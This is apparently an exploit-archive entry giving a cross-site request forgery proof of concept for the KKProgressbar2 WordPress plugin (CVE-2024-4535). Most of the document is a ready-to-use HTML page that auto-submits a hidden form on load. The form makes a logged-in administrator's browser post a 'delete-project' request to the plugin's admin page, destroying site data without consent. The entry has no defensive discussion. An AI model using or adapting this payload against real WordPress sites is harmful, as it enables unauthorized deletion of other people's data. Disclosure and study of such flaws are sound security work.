# Exploit Title: WordPress Plugin KKProgressbar2 - Cross-Site Request
Forgery (CSRF)
# Date: 2025-10-05
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Tested on: Win, Ubuntu
# CVE : CVE-2024-4535

                              POC:

<body onload="document.forms[0].submit()">
    <form action="http:// target.com/wp-admin/admin.php?page=kkpb-menu"
method="post">
        <input type="hidden" name="action" value="delete-project">
        <input type="hidden" name="id" value="<<ID>>">
    </form>
</body>